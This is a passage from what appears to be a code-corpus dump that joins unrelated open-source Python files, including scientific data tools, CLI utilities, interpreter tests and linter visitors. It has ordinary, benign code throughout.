cupy_output = spt.image_rotate_90(cupy_arr, 1, [1, 2])
np_output = cupy.asnumpy(cupy_output)
assert np.allclose(np_output, rotate90_arr)
def test_rotate90_batchinput():
arr = get_input_arr()
rotate90_arr = get_rotated_data()
arr_batch = np.stack((arr,) * 8, axis=0)
np_output = spt.image_rotate_90(arr_batch, 1, [2, 3])
assert np_output.shape[0] == 8
for i in range(np_output.shape[0]):
assert np.allclose(np_output[i], rotate90_arr)
|
pycalphad/core/constraints.py | HUISUN24/pycalphad | 162 | 12697215 | <filename>pycalphad/core/constraints.py
from pycalphad.core.constants import INTERNAL_CONSTRAINT_SCALING
from pycalphad.codegen.sympydiff_utils import build_constraint_functions
from collections import namedtuple
ConstraintTuple = namedtuple('ConstraintTuple', ['internal_cons_func', 'internal_cons_jac', 'internal_cons_hess',
'num_internal_cons'])
def build_constraints(mod, variables, parameters=None):
internal_constraints = mod.get_internal_constraints()
internal_constraints = [INTERNAL_CONSTRAINT_SCALING*x for x in internal_constraints]
cf_output = build_constraint_functions(variables, internal_constraints,
parameters=parameters)
internal_cons_func = cf_output.cons_func
internal_cons_jac = cf_output.cons_jac
internal_cons_hess = cf_output.cons_hess
return ConstraintTuple(internal_cons_func=internal_cons_func, internal_cons_jac=internal_cons_jac,
internal_cons_hess=internal_cons_hess,
num_internal_cons=len(internal_constraints))
|
cachebrowser/cli.py | zhenyihan/cachebrowser | 1,206 | 12697222 | <reponame>zhenyihan/cachebrowser<gh_stars>1000+
from functools import update_wrapper, partial
import json
import logging
from cachebrowser.models import Host
import click
from cachebrowser.api.core import APIManager, APIRequest
from cachebrowser.bootstrap import BootstrapError
main_commands = ['hostcli', 'cdncli', 'bootstrap']
api = APIManager()
logger = logging.getLogger(__name__)
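# Decorator factory: packs the click command's arguments into an APIRequest for
# `route` and installs the wrapped function as the reply handler that renders
# the API response for the CLI user.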
def forward_to_api(route, params=None):
def wrapper(func):
@click.pass_obj
def inner(context, **kwargs):
request_params = params.copy() if params else {}
request_params.update(kwargs)
request = APIRequest(route, request_params)
request.reply = partial(func, context)
api.handle_api_request(context, request)
return update_wrapper(inner, func)
return wrapper
@click.group('host')
def hostcli():
pass
@hostcli.command('add')
@forward_to_api('/hosts/add')
@click.argument('hostname')
@click.argument('cdn')
@click.option('--ssl/--no-ssl', 'ssl', default=True)
def addhost(context):
click.echo("New host added")
@hostcli.command('list')
@forward_to_api('/hosts', {'page': 0, 'num_per_page': 0})
def listhost(context, hosts):
click.echo('\n'.join([host['hostname'] for host in hosts]))
@click.group('cdn')
def cdncli():
pass
@cdncli.command('add')
@forward_to_api('/cdns/add')
@click.argument('id')
@click.option('--name')
@click.option('--edge-server')
def addcdn(context):
click.echo("New CDN added")
@cdncli.command('list')
@forward_to_api('/cdns', {'page': 0, 'num_per_page': 0})
def listcdn(context, cdns):
click.echo('\n'.join([cdn['id'] for cdn in cdns]))
@click.command('bootstrap')
@click.option('--save/--no-save', is_flag=True, default=False,
help="Save bootstrap information to database (default --no-save)")
@click.argument('hostname')
@click.pass_obj
def bootstrap(context, save, hostname):
try:
host_data = context.bootstrapper.lookup_host(hostname)
except BootstrapError:
logger.warning("No bootstrap information found for host '{}'".format(hostname))
return
logger.info(json.dumps(host_data, indent=4))
if save:
host = Host(**host_data)
host.save()
|
rllab/envs/mujoco/hill/walker2d_hill_env.py | RussellM2020/maml_gps | 1,838 | 12697234 | import numpy as np
from rllab.envs.mujoco.hill.hill_env import HillEnv
from rllab.envs.mujoco.walker2d_env import Walker2DEnv
from rllab.misc.overrides import overrides
import rllab.envs.mujoco.hill.terrain as terrain
from rllab.spaces import Box
class Walker2DHillEnv(HillEnv):
MODEL_CLASS = Walker2DEnv
@overrides
def _mod_hfield(self, hfield):
# clear a flat patch for the robot to start off from
return terrain.clear_patch(hfield, Box(np.array([-2.0, -2.0]), np.array([-0.5, -0.5]))) |
tests/python/twitter/common/contextutil/test_pushd.py | zhouyijiaren/commons | 1,143 | 12697248 | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import os
from twitter.common.contextutil import pushd, temporary_dir
def test_simple_pushd():
pre_cwd = os.getcwd()
with temporary_dir() as tempdir:
with pushd(tempdir) as path:
assert path == tempdir
assert os.getcwd() == os.path.realpath(tempdir)
assert os.getcwd() == pre_cwd
assert os.getcwd() == pre_cwd
def test_nested_pushd():
pre_cwd = os.getcwd()
with temporary_dir() as tempdir1:
with pushd(tempdir1) as path1:
assert os.getcwd() == os.path.realpath(tempdir1)
with temporary_dir(root_dir=tempdir1) as tempdir2:
with pushd(tempdir2) as path2:
assert os.getcwd() == os.path.realpath(tempdir2)
assert os.getcwd() == os.path.realpath(tempdir1)
assert os.getcwd() == os.path.realpath(tempdir1)
assert os.getcwd() == pre_cwd
assert os.getcwd() == pre_cwd
|
examples/inprocess_qtconsole.py | KDAB/qtconsole | 329 | 12697269 | """An example of embedding a RichJupyterWidget with an in-process kernel.
We recommend using a kernel in a separate process as the normal option - see
embed_qtconsole.py for more information. In-process kernels are not well
supported.
To run this example:
python3 inprocess_qtconsole.py
"""
from qtpy import QtWidgets
from qtconsole.rich_jupyter_widget import RichJupyterWidget
from qtconsole.inprocess import QtInProcessKernelManager
def show():
global ipython_widget # Prevent from being garbage collected
# Create an in-process kernel
kernel_manager = QtInProcessKernelManager()
kernel_manager.start_kernel(show_banner=False)
kernel = kernel_manager.kernel
kernel.gui = 'qt4'
kernel_client = kernel_manager.client()
kernel_client.start_channels()
ipython_widget = RichJupyterWidget()
ipython_widget.kernel_manager = kernel_manager
ipython_widget.kernel_client = kernel_client
ipython_widget.show()
if __name__ == "__main__":
app = QtWidgets.QApplication([])
show()
app.exec_()
|
lexos/receivers/tokenizer_receiver.py | WheatonCS/Lexos | 107 | 12697271 | <reponame>WheatonCS/Lexos
"""This is the receiver for the tokenizer model."""
from typing import NamedTuple, Optional
from lexos.receivers.base_receiver import BaseReceiver
class TokenizerOption(NamedTuple):
"""The typed tuple to hold tokenizer front end option."""
start: Optional[int]
length: Optional[int]
search: Optional[str]
sort_column: Optional[int]
sort_method: Optional[bool]
csv_documents_as_rows: Optional[bool]
class TokenizerReceiver(BaseReceiver):
"""Get the tokenizer table orientation from front end."""
def __init__(self):
"""Initialize the class."""
super().__init__()
    def options_from_front_end(self) -> TokenizerOption:
        """Get the tokenizer options from the front end.
        :return: a TokenizerOption object that holds the options.
"""
# This exception is here because when header is requested, values
# above related to data table drawing are not passed in.
try:
start = int(self._front_end_data["tokenizer_table_page_number"])
search = self._front_end_data["tokenizer_table_search_input"]
length = int(self._front_end_data["tokenizer_table_row_count"])
sort_method = bool(self._front_end_data[
"tokenizer_table_sort_mode"] == "Ascending")
sort_column = int(self._front_end_data[
"tokenizer_table_selected_column"])
csv_documents_as_rows = bool(self._front_end_data[
"csv_orientation"] == "Documents as Rows" if
"csv_orientation" in self._front_end_data else True)
except KeyError:
start = None
search = None
length = None
sort_method = None
sort_column = None
csv_documents_as_rows = None
# Pack everything and returns it as a NamedTuple.
return TokenizerOption(
start=start,
length=length,
search=search,
sort_column=sort_column,
sort_method=sort_method,
csv_documents_as_rows=csv_documents_as_rows
)
|
testing/test_standard.py | jweinraub/hippyvm | 289 | 12697284 | from testing.test_interpreter import BaseTestInterpreter
class TestStandardModule(BaseTestInterpreter):
def test_escapeshellarg(self):
output = self.run('''
echo escapeshellarg("xyz");
echo escapeshellarg('$X');
echo escapeshellarg("'");
echo escapeshellarg("x'y\\"z");
echo escapeshellarg("\\\\");
''')
assert self.unwrap(output[0]) == "'xyz'"
assert self.unwrap(output[1]) == "'$X'"
assert self.unwrap(output[2]) == "''\\'''"
assert self.unwrap(output[3]) == "'x'\\''y\"z'"
assert self.unwrap(output[4]) == "'\\'"
def test_shell_exec(self):
output = self.run('''
echo shell_exec('doesnotexist');
echo shell_exec('echo 0');
''')
assert output[0] == self.space.w_Null
assert self.space.str_w(output[1]) == "0\n"
def test_exec(self):
output = self.run('''
echo exec('doesnotexist');
echo exec('echo a && echo b');
''')
assert output[0] == self.space.wrap('')
assert self.space.str_w(output[1]) == "b"
def test_exec_error(self):
with self.warnings([
'Warning: exec(): Cannot execute a blank command']):
output = self.run('''
echo exec('');
echo exec(123);
''')
assert output == [self.space.w_False, self.space.wrap('')]
def test_exec_2(self):
output = self.run('''
$arr = array('foo');
echo exec('echo a && echo b', $arr);
echo $arr;
''')
assert map(self.space.str_w, output[1].as_list_w()) == ['foo', 'a', 'b']
|
corehq/apps/hqwebapp/tests/test_custom_login_page.py | dimagilg/commcare-hq | 471 | 12697333 | from django.test import SimpleTestCase, override_settings
from corehq.apps.hqwebapp.login_utils import get_custom_login_page
class TestCustomLogin(SimpleTestCase):
@override_settings(CUSTOM_LANDING_TEMPLATE=None)
def test_nothing_configured(self):
self.assertEqual(None, get_custom_login_page('example.com'))
@override_settings(CUSTOM_LANDING_TEMPLATE='custom/login.html')
def test_string_configured(self):
self.assertEqual('custom/login.html', get_custom_login_page('example.com'))
@override_settings(CUSTOM_LANDING_TEMPLATE={'example.com': 'custom/login.html'})
def test_dict_match(self):
self.assertEqual('custom/login.html', get_custom_login_page('example.com'))
@override_settings(CUSTOM_LANDING_TEMPLATE={'example.com': 'custom/login.html'})
def test_dict_mismatch(self):
self.assertEqual(None, get_custom_login_page('commcarehq.org'))
@override_settings(CUSTOM_LANDING_TEMPLATE={'example.com': 'custom/login.html',
'default': 'normal/login.html'})
def test_dict_default(self):
self.assertEqual('custom/login.html', get_custom_login_page('example.com'))
self.assertEqual('normal/login.html', get_custom_login_page('commcarehq.org'))
|
cape_privacy/coordinator/auth/api_token_test.py | vismaya-Kalaiselvan/cape-python | 144 | 12697348 | from cape_privacy.coordinator.auth.api_token import create_api_token
def test_api_token():
token_id = "imatokenid"
secret = "<KEY>"
token = create_api_token(token_id, secret)
assert token.token_id == token_id
assert token.secret == bytes(secret, "utf-8")
assert token.version == 1
|
tkinter/popup-menu-close/main.py | whitmans-max/python-examples | 140 | 12697366 | import tkinter as tk
def hello():
print("hello!")
def popup(event):
menu.post(event.x_root, event.y_root)
menu.focus()
def popup_close(event):
menu.unpost()
root = tk.Tk()
# frame
frame = tk.Frame(root, width=512, height=512)
frame.pack()
# popup menu
menu = tk.Menu(root, tearoff=0)
menu.add_command(label="Undo", command=hello)
menu.add_command(label="Redo", command=hello)
# events
frame.bind("<Button-3>", popup)
frame.bind("<Button-1>", popup_close)
menu.bind("<Escape>", popup_close)
root.mainloop()
|
DQM/CSCMonitorModule/python/test/csc_hlt_dqm_sourceclient-live.py | ckamtsikis/cmssw | 852 | 12697370 | import FWCore.ParameterSet.Config as cms
process = cms.Process("CSCHLTDQM")
#-------------------------------------------------
# DQM Module Configuration
#-------------------------------------------------
process.load("DQM.CSCMonitorModule.csc_hlt_dqm_sourceclient_cfi")
#----------------------------
# Event Source
#-----------------------------
process.load("DQM.Integration.test.inputsource_live_cfi")
#process.EventStreamHttpReader.consumerName = 'CSC HLT DQM Consumer'
#process.EventStreamHttpReader.sourceURL = "http://localhost:50082/urn:xdaq-application:lid=29"
#----------------------------
# DQM Environment
#-----------------------------
process.load("DQMServices.Core.DQM_cfg")
process.load("DQMServices.Components.DQMEnvironment_cfi")
#----------------------------
# DQM Playback Environment
#-----------------------------
process.load("DQM.Integration.test.environment_playback_cfi")
process.dqmEnv.subSystemFolder = "CSC"
process.DQM.collectorHost = 'pccmsdqm02.cern.ch'
#process.DQM.collectorHost = 'localhost'
process.dqmSaver.dirName = '.'
#--------------------------
# Message Logger
#--------------------------
MessageLogger = cms.Service("MessageLogger",
suppressInfo = cms.untracked.vstring('source'),
suppressDebug = cms.untracked.vstring('source'),
suppressWarning = cms.untracked.vstring('source'),
cout = cms.untracked.PSet(
threshold = cms.untracked.string('INFO'),
WARNING = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
noLineBreaks = cms.untracked.bool(False)
),
detailedInfo = cms.untracked.PSet(
threshold = cms.untracked.string('INFO')
),
critical = cms.untracked.PSet(
threshold = cms.untracked.string('ERROR')
),
debug = cms.untracked.PSet(
threshold = cms.untracked.string('DEBUG')
),
debugModules = cms.untracked.vstring('CSCHLTMonitormodule'),
destinations = cms.untracked.vstring(
# 'debug',
# 'detailedInfo',
# 'critical',
# 'cout'
)
)
#--------------------------
# Sequences
#--------------------------
process.p = cms.Path(process.dqmCSCClient+process.dqmEnv+process.dqmSaver)
|
samples/client/wordnik-api/python/wordnik/models/AudioFile.py | OneSpan/swagger-codegen | 133 | 12697378 | #!/usr/bin/env python
"""
Copyright 2012 Wordnik, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class AudioFile:
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'attributionUrl': 'str',
'commentCount': 'int',
'voteCount': 'int',
'fileUrl': 'str',
'audioType': 'str',
'id': 'long',
'duration': 'float',
'attributionText': 'str',
'createdBy': 'str',
'description': 'str',
'createdAt': 'datetime',
'voteWeightedAverage': 'float',
'voteAverage': 'float',
'word': 'str'
}
self.attributionUrl = None # str
self.commentCount = None # int
self.voteCount = None # int
self.fileUrl = None # str
self.audioType = None # str
self.id = None # long
self.duration = None # float
self.attributionText = None # str
self.createdBy = None # str
self.description = None # str
self.createdAt = None # datetime
self.voteWeightedAverage = None # float
self.voteAverage = None # float
self.word = None # str
|
db_migrate_manager.py | masonsxu/red-flask | 161 | 12697393 | # -*- coding: utf-8 -*-
# @ Time : 2021/4/6 14:46
# @ Author : Redtree
# @ File : db_manager
# @ Desc : 单独将flask_migrate部分功能移出,不与flask_app本地IDE工具调试冲突。
from __init__ import manager
manager.run()
'''
在工程根目录下,运行
python db_migrate_manager.py db init
python db_migrate_manager.py db migrate
python db_migrate_manager.py db upgrade
python db_migrate_manager.py db --help
''' |
esmvaltool/cmorizers/obs/osi_common.py | cffbots/ESMValTool | 148 | 12697418 | <reponame>cffbots/ESMValTool<filename>esmvaltool/cmorizers/obs/osi_common.py
"""Common functionalities for OSI-450 dataset cmorization."""
import logging
import os
import glob
from datetime import datetime, timedelta
from calendar import monthrange, isleap
import numpy as np
import iris
import iris.exceptions
from iris.cube import Cube, CubeList
from iris.coords import AuxCoord
from iris.coord_categorisation import add_day_of_year
from esmvalcore.preprocessor import monthly_statistics
from .utilities import (set_global_atts, convert_timeunits, fix_var_metadata,
save_variable)
logger = logging.getLogger(__name__)
class OSICmorizer():
"""Cmorizer for OSI-450 datasets."""
def __init__(self, in_dir, out_dir, cfg, hemisphere):
self.in_dir = in_dir
self.out_dir = out_dir
self.cfg = cfg
self.hemisphere = hemisphere
self.min_days = self.cfg['custom'].get('min_days', 50)
def cmorize(self):
"""Cmorize OSI-450 or OSI-409 dataset."""
logger.info(
"Starting cmorization for Tier%s OBS files: %s",
self.cfg['attributes']['tier'],
self.cfg['attributes']['dataset_id'])
logger.info("Input data from: %s", self.in_dir)
logger.info("Output will be written to: %s", self.out_dir)
# run the cmorization
first_run = True
for var, vals in self.cfg['variables'].items():
var_info = {}
for mip in vals['mip']:
var_info[mip] = self.cfg['cmor_table'].get_variable(mip, var)
file_pattern = '{0}_{1}_{2}_*.nc'.format(
vals['raw'], self.hemisphere, vals['grid']
)
for year in os.listdir(self.in_dir):
year = int(year)
logger.info(
"CMORizing var %s for year %s", var, year
)
raw_info = {
'name': vals['raw'],
'file': os.path.join(
self.in_dir, str(year), '??', file_pattern)
}
self._extract_variable(var_info, raw_info, year, vals['mip'])
if first_run:
sample_file = glob.glob(os.path.join(
self.in_dir, str(year), '01', file_pattern))[0]
cube = iris.load_cube(
sample_file,
iris.Constraint(
# pylint: disable=cell-var-from-loop
cube_func=lambda c: c.var_name == raw_info['name'])
)
self._create_areacello(cube)
first_run = False
    def _extract_variable(self, var_infos, raw_info, year, mips):
        """Extract the variable and save one output per requested MIP table."""
cubes = iris.load(
raw_info['file'],
iris.Constraint(cube_func=lambda c: c.var_name == raw_info['name'])
)
tracking_ids = self._unify_attributes(cubes)
cube = cubes.concatenate_cube()
del cubes
if tracking_ids:
cube.attributes['tracking_ids'] = tracking_ids
cube.coord('projection_x_coordinate').var_name = 'x'
cube.coord('projection_y_coordinate').var_name = 'y'
lon_coord = cube.coord('longitude')
lon_coord.points[lon_coord.points < 0] += 360
source_cube = cube
attrs = self.cfg['attributes']
for mip in mips:
var_info = var_infos[mip]
attrs['mip'] = mip
if var_info.frequency == 'mon':
cube = monthly_statistics(source_cube)
cube = self._fill_months(cube)
elif var_info.frequency == 'day':
cube = self._fill_days(source_cube, year)
if not cube:
continue
logger.debug(cube)
fix_var_metadata(cube, var_info)
convert_timeunits(cube, year)
set_global_atts(cube, attrs)
self._try_remove_coord(cube, 'year')
self._try_remove_coord(cube, 'day_of_year')
self._try_remove_coord(cube, 'month_number')
self._try_remove_coord(cube, 'day_of_month')
save_variable(cube, var_info.short_name, self.out_dir, attrs)
return cube
@staticmethod
def _try_remove_coord(cube, coord):
try:
cube.remove_coord(coord)
except iris.exceptions.CoordinateNotFoundError:
pass
@staticmethod
def _fill_months(cube):
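        # Pad a monthly series to 12 time steps, inserting all-masked cubes for any missing months.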
if cube.coord('time').shape[0] == 12:
return cube
cubes = CubeList(cube.slices_over('time'))
model_cube = cubes[0].copy()
for month in range(1, 13):
month_constraint = iris.Constraint(
# pylint: disable=cell-var-from-loop
time=lambda cell: cell.point.month == month
)
if cubes.extract(month_constraint):
continue
cubes.append(
OSICmorizer._create_nan_cube(model_cube, month, month=True))
cube = cubes.merge_cube()
return cube
def _fill_days(self, cube, year):
if cube.coord('time').shape[0] < self.min_days:
logger.warning(
'Only %s days available. Skip generation of daily files',
cube.coord('time').shape[0]
)
return None
total_days = 366 if isleap(year) else 365
if cube.coord('time').shape[0] < total_days:
cubes = OSICmorizer._add_nan_timesteps(cube, total_days)
cube = cubes.merge_cube()
cube.remove_coord('day_of_year')
del cubes
return cube
@staticmethod
def _add_nan_timesteps(cube, total_days):
add_day_of_year(cube, 'time')
cubes = CubeList(cube.slices_over('time'))
model_cube = cubes[0].copy()
model_cube.remove_coord('day_of_year')
for day_of_year in range(total_days):
day_constraint = iris.Constraint(
day_of_year=day_of_year + 1
)
if cubes.extract(day_constraint):
continue
nan_cube = OSICmorizer._create_nan_cube(
model_cube, day_of_year, month=False
)
add_day_of_year(nan_cube, 'time')
cubes.append(nan_cube)
del model_cube
return cubes
@staticmethod
def _create_nan_cube(model_cube, num, month):
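        """Return an all-masked copy of ``model_cube`` stamped with month or day-of-year ``num``."""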
nan_cube = model_cube.copy(
np.ma.masked_all(model_cube.shape, dtype=model_cube.dtype)
)
time_coord = nan_cube.coord('time')
nan_cube.remove_coord(time_coord)
date = time_coord.cell(0).point
if month:
date = datetime(date.year, num, date.day)
bounds = (
datetime(date.year, num, 1),
datetime(date.year, num, monthrange(date.year, num)[1])
)
else:
date = datetime(date.year, 1, 1, 12) + timedelta(days=num)
bounds = (
datetime(date.year, 1, 1) + timedelta(days=num),
datetime(date.year, 1, 1, 23, 59) + timedelta(days=num)
)
date = time_coord.units.date2num(date)
bounds = (
time_coord.units.date2num(bounds[0]),
time_coord.units.date2num(bounds[1]),
)
nan_cube.add_aux_coord(AuxCoord(
[date],
standard_name=time_coord.standard_name,
var_name=time_coord.var_name,
long_name=time_coord.long_name,
units=time_coord.units,
attributes=time_coord.attributes,
bounds=[bounds],
))
return nan_cube
@staticmethod
def _unify_attributes(cubes):
tracking_ids = []
for cube in cubes:
# OSI-409 and OSI-450 do not have the same attributes
try:
tracking_ids.append(cube.attributes['tracking_id'])
except KeyError:
pass
to_remove = [
'time_coverage_start', 'time_coverage_end',
'history', 'tracking_id', 'start_date', 'stop_date',
]
for attr in to_remove:
try:
del cube.attributes[attr]
except KeyError:
pass
return tracking_ids
def _create_areacello(self, sample_cube):
if not self.cfg['custom'].get('create_areacello', False):
return
var_info = self.cfg['cmor_table'].get_variable('fx', 'areacello')
lat_coord = sample_cube.coord('latitude')
self.cfg['attributes']['mip'] = 'fx'
cube = Cube(
np.full(
lat_coord.shape,
self.cfg['custom']['grid_cell_size'],
np.float32),
standard_name=var_info.standard_name,
long_name=var_info.long_name,
var_name=var_info.short_name,
units='m2',
)
cube.add_aux_coord(lat_coord, (0, 1))
cube.add_aux_coord(sample_cube.coord('longitude'), (0, 1))
cube.add_dim_coord(sample_cube.coord('projection_y_coordinate'), 0)
cube.add_dim_coord(sample_cube.coord('projection_x_coordinate'), 1)
cube.coord('projection_x_coordinate').var_name = 'x'
cube.coord('projection_y_coordinate').var_name = 'y'
fix_var_metadata(cube, var_info)
set_global_atts(cube, self.cfg['attributes'])
save_variable(
cube, var_info.short_name, self.out_dir,
self.cfg['attributes'], zlib=True
)
|
tests/test_base_os.py | mattlemmone/elasticsearch-docker | 866 | 12697467 | <reponame>mattlemmone/elasticsearch-docker
from .fixtures import elasticsearch
def test_base_os(host):
assert host.system_info.distribution == 'centos'
assert host.system_info.release == '7'
def test_no_core_files_exist_in_root(host):
core_file_check_cmdline = 'ls -l /core*'
assert host.run(core_file_check_cmdline).exit_status != 0
def test_all_elasticsearch_files_are_gid_0(host):
check_for_files_with_gid_0_command = (
"cd /usr/share && "
"find ./elasticsearch ! -gid 0 | "
"egrep '.*'"
)
assert host.run(check_for_files_with_gid_0_command).exit_status != 0
|
wemake_python_styleguide/visitors/tokenize/comments.py | cdhiraj40/wemake-python-styleguide | 1,931 | 12697480 | r"""
Disallows using incorrect magic comments.
This is what a basic ``comment`` type token looks like:
.. code:: python
TokenInfo(
type=57 (COMMENT),
string='# noqa: WPS100',
start=(1, 4),
end=(1, 16),
line="u'' # noqa: WPS100\n",
)
All comments have the same type.
"""
import re
import tokenize
from token import ENDMARKER
from typing import ClassVar
from typing.re import Pattern
from typing_extensions import Final, final
from wemake_python_styleguide.constants import MAX_NO_COVER_COMMENTS, STDIN
from wemake_python_styleguide.logic.system import is_executable_file, is_windows
from wemake_python_styleguide.logic.tokens.constants import NEWLINES
from wemake_python_styleguide.logic.tokens.strings import get_comment_text
from wemake_python_styleguide.violations.best_practices import (
EmptyCommentViolation,
ForbiddenInlineIgnoreViolation,
OveruseOfNoCoverCommentViolation,
OveruseOfNoqaCommentViolation,
ShebangViolation,
WrongDocCommentViolation,
WrongMagicCommentViolation,
)
from wemake_python_styleguide.visitors.base import BaseTokenVisitor
EMPTY_STRING: Final = ''
SENTINEL_TOKEN: Final = tokenize.TokenInfo(
type=ENDMARKER,
string=EMPTY_STRING,
start=(0, 0),
end=(0, 0),
line=EMPTY_STRING,
)
@final
class WrongCommentVisitor(BaseTokenVisitor):
"""Checks comment tokens."""
_no_cover: ClassVar[Pattern] = re.compile(r'^pragma:\s+no\s+cover')
_type_check: ClassVar[Pattern] = re.compile(
r'^type:\s?([\w\d\[\]\'\"\.]+)$',
)
def __init__(self, *args, **kwargs) -> None:
"""Initializes a counter."""
super().__init__(*args, **kwargs)
self._no_cover_count = 0
def visit_comment(self, token: tokenize.TokenInfo) -> None:
"""Performs comment checks."""
self._check_typed_ast(token)
self._check_empty_doc_comment(token)
self._check_cover_comments(token)
def _check_typed_ast(self, token: tokenize.TokenInfo) -> None:
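        # Only the ``# type: ignore`` form of typed-ast comments is accepted; any other ``# type:`` comment is reported.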
comment_text = get_comment_text(token)
match = self._type_check.match(comment_text)
if not match:
return
declared_type = match.groups()[0].strip()
if not declared_type.startswith('ignore'):
self.add_violation(
WrongMagicCommentViolation(token, text=comment_text),
)
def _check_empty_doc_comment(self, token: tokenize.TokenInfo) -> None:
if get_comment_text(token) == ':':
self.add_violation(WrongDocCommentViolation(token))
def _check_cover_comments(self, token: tokenize.TokenInfo) -> None:
comment_text = get_comment_text(token)
match = self._no_cover.match(comment_text)
if not match:
return
self._no_cover_count += 1
def _post_visit(self) -> None:
if self._no_cover_count > MAX_NO_COVER_COMMENTS:
self.add_violation(
OveruseOfNoCoverCommentViolation(
text=str(self._no_cover_count),
baseline=MAX_NO_COVER_COMMENTS,
),
)
@final
class EmptyCommentVisitor(BaseTokenVisitor):
"""Checks empty comment tokens."""
def __init__(self, *args, **kwargs) -> None:
"""Initializes fields to track empty comments."""
super().__init__(*args, **kwargs)
self._line_num = -1
self._prev_comment_line_num = -1
self._prev_non_empty = -1
self._in_same_block = True
self._block_alerted = False
self._reserved_token = SENTINEL_TOKEN
def visit_comment(self, token: tokenize.TokenInfo) -> None:
"""Performs comment checks."""
self._check_empty_comment(token)
def _check_empty_comment(self, token: tokenize.TokenInfo) -> None:
self._line_num = token.start[0]
self._check_same_block(token)
# Triggering reserved token to be added
if not self._in_same_block and self._has_reserved_token():
self.add_violation(EmptyCommentViolation(self._reserved_token))
self._block_alerted = True
self._reserved_token = SENTINEL_TOKEN
if get_comment_text(token) == EMPTY_STRING:
if not self._in_same_block:
# Stand alone empty comment or first empty comment in a block
self.add_violation(EmptyCommentViolation(token))
self._block_alerted = True
self._in_same_block = True
to_reserve = (
# Empty comment right after non-empty, block not yet alerted
self._is_consecutive(self._prev_non_empty) and
self._in_same_block and
not self._block_alerted
)
if to_reserve:
self._reserved_token = token
else:
self._prev_non_empty = self._line_num
if self._in_same_block:
self._reserved_token = SENTINEL_TOKEN
self._prev_comment_line_num = token.start[0]
def _check_same_block(self, token: tokenize.TokenInfo) -> None:
self._in_same_block = (
self._is_consecutive(self._prev_comment_line_num) and
token.line.lstrip()[0] == '#' # is inline comment
)
if not self._in_same_block:
self._block_alerted = False
def _is_consecutive(self, prev_line_num: int) -> bool:
return (self._line_num - prev_line_num == 1)
def _has_reserved_token(self) -> bool:
return (self._reserved_token != SENTINEL_TOKEN)
def _post_visit(self) -> None:
if self._has_reserved_token() and not self._block_alerted:
self.add_violation(EmptyCommentViolation(self._reserved_token))
@final
class ShebangVisitor(BaseTokenVisitor):
"""
Checks the first shebang in the file.
    Code is inspired by https://github.com/xuhdev/flake8-executable
"""
_shebang: ClassVar[Pattern] = re.compile(r'(\s*)#!')
_python_executable: ClassVar[str] = 'python'
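    # Rough examples (sketch): '#!/usr/bin/env python3' and '#!python' are both
    # treated as shebang lines by ``_shebang``; a shebang that does not mention
    # 'python' is flagged by ``_check_valid_shebang``.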
def visit_comment(self, token: tokenize.TokenInfo) -> None:
"""Checks if there is an executable mismatch."""
if not self._is_first_comment(token):
return # this is a regular comment, not a shebang
is_shebang = self._is_valid_shebang_line(token)
self._check_executable_mismatch(token, is_shebang=is_shebang)
if is_shebang:
self._check_valid_shebang(token)
def _check_executable_mismatch(
self,
token: tokenize.TokenInfo,
*,
is_shebang: bool,
) -> None:
if is_windows() or self.filename == STDIN:
# Windows does not have this concept of "executable" file.
# The same for STDIN inputs.
return
is_executable = is_executable_file(self.filename)
if is_executable and not is_shebang:
self.add_violation(
ShebangViolation(
text='file is executable but no shebang is present',
),
)
elif not is_executable and is_shebang:
self.add_violation(
ShebangViolation(
text='shebang is present but the file is not executable',
),
)
def _check_valid_shebang(self, token: tokenize.TokenInfo) -> None:
if self._python_executable not in token.line:
self.add_violation(
ShebangViolation(
text='shebang is present but does not contain `python`',
),
)
if token.start[1] != 0:
self.add_violation(
ShebangViolation(
text='there is a whitespace before shebang',
),
)
if token.start[0] != 1:
self.add_violation(
ShebangViolation(
text='there are blank or comment lines before shebang',
),
)
def _is_first_comment(self, token: tokenize.TokenInfo) -> bool:
all_tokens = iter(self.file_tokens)
current_token = next(all_tokens)
while True:
if current_token == token:
return True
elif current_token.exact_type not in NEWLINES:
break
current_token = next(all_tokens)
return False
def _is_valid_shebang_line(self, token: tokenize.TokenInfo) -> bool:
return self._shebang.match(token.line) is not None
@final
class NoqaVisitor(BaseTokenVisitor):
"""Checks noqa comment tokens."""
_noqa_check: ClassVar[Pattern] = re.compile(r'^(noqa:?)($|[A-Z\d\,\s]+)')
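    # Rough examples (sketch): 'noqa: WPS100, WPS110' yields prefix 'noqa:' and
    # excludes 'WPS100, WPS110'; a bare 'noqa' yields empty excludes and is
    # reported as a wrong magic comment.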
def __init__(self, *args, **kwargs) -> None:
"""Initializes a counter."""
super().__init__(*args, **kwargs)
self._noqa_count = 0
def visit_comment(self, token: tokenize.TokenInfo) -> None:
"""Performs comment checks."""
self._check_noqa(token)
def _check_noqa(self, token: tokenize.TokenInfo) -> None:
comment_text = get_comment_text(token)
match = self._noqa_check.match(comment_text)
if not match:
return
self._noqa_count += 1
excludes = match.groups()[1].strip()
prefix = match.groups()[0].strip()
if not excludes or prefix[-1] != ':':
# We cannot pass the actual line here,
# since it will be ignored due to `# noqa` comment:
self.add_violation(WrongMagicCommentViolation(text=comment_text))
return
self._check_forbidden_noqa(excludes)
def _check_forbidden_noqa(self, noqa_excludes) -> None:
excludes_list = [ex.strip() for ex in noqa_excludes.split(',')]
forbidden_noqa = EMPTY_STRING.join(self.options.forbidden_inline_ignore)
for noqa_code in forbidden_noqa.split(','):
noqa_code = noqa_code.strip()
if noqa_code in excludes_list:
self.add_violation(
ForbiddenInlineIgnoreViolation(text=str(noqa_excludes)),
)
return
if not noqa_code.isalpha():
